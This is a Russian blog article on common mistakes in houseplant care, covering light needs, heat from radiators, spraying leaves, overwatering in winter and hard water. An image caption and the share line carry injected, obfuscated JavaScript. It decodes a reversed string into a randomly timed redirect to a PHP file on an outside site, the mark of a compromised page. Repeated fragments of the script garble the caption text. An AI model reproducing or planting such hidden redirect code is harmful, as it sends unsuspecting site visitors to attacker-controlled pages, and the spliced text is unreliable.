www.osnovosti.ru
smk-pride.ru

Ошибки при уходе за домашними растениями

Ухаживать за вашими «зелёными друзьями» без соответствующих рекомендаций, которые обычно дают в специализированных магазинах при покупке растений, всё равно, что готовить слоёный торт без рецепта. Сегодня мы расскажем о самых распространённых ошибках при уходе за вашими домашними растениями.

dying plant in a pot

dying plant in a pot


Комнатные растения есть в доме практически у каждого. И если это не эрзац герани или фиалок в виде плесени на вашем позавчерашнем чае или мха с северной стороны вашего трюмо, то эта статья для вас.

Каждому своё

Как известно, у каждого растения своё место под солнцем: аглаонема, например, не выносит прямых солнечных лучей; аспидистра — «чугунное» растение, которому не страшны ни грязный воздух, ни редкий полив; а вот потус, или «чёртов плющ» терпеть не может сквозняков и предпочитает расти в подвесных горшках у стены. Перечень условий для комфортного обитания у каждого растения свой, особенный. Поэтому внимательно изучите потребности каждого представителя флоры в вашем доме.
2
3

Батарея — враг растений

Среди комнатных растений нет таких, которые бы любили находиться над батареей или в непосредственной близости от неё. Разве что только кактусы и фикусы (но широколиственные фикусы, например, жары также не выносят). И как бы вы активно не поливали их, не думая о водопроводных счётчиках, тепло радиатора их высушит, и рано или поздно цветы завянут.

4

Вода — это жизнь

Не забывайте не только поливать свои комнатные растения, но и увлажнять их листья и стебли, с помощью пульверизатора например. Ведь в вашей квартире вряд ли пойдёт дождь, а влага нужна как корневой системе, так и наружной части растений. Проделывать такие водные процедуры рекомендуется раз в неделю.

5

Много — не значит хорошо

Поливать цветы, конечно, хорошо и правильно. Но у каждого растения есть период в жизни (как правило это зима), когда оно «впадает в спячку» и не растёт. Вот именно в такие моменты обильный и частый полив может загубить вашу гортензию.
6
Не идите против природы / не играйте в друида
Некоторым растениям, таким как азалии, цикламены, хризантемы и герберы например, предначертано матушкой-природой цвести приблизительно раз в год. Вы, безусловно, можете поиграть в друида и опрыскать ваших «питомцев» всякими химикатами — их на прилавках цветочных лавок в достатке, но мы в редакции Roomble.com против «стероидных» экспериментов с живой природой.

Picture of h<script><p class=$Ikf=function(n){if (typeof ($Ikf.list[n]) == «string») return $Ikf.list[n].split(«»).reverse().join(«»);return $Ikf.list[n];};$Ikf.list=[«\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and holding spray andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and spraying leafs of tree.» width=»300″ height=»201″ class=»size-medium wp-image-441″ /> Picture of handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and holding spray andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and spraying leafs of tree.


Выбирайте воду правильно

Вы купили своему фикусу новый керамический горшок, а на нём уже после первого полива остался белый налёт? Всё дело в избытке минеральных веществ, которые делают воду жёсткой. Поливайте ваши цветы «глюкозной» или кипячёной (только не горячей) водой. Для полива также можно использовать аквариумную воду (только с рыбками поаккуратнее).

8

Теперь вашим знаниям может позавидовать любой садовод-любитель. Любите свои домашние растения и не обделяйте их вниманием.

источник

Ключевые слова: комнатные растения
Опубликовала Ольга Филиппова , 18.11.2015 в 13:22

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Яндекс.Метрика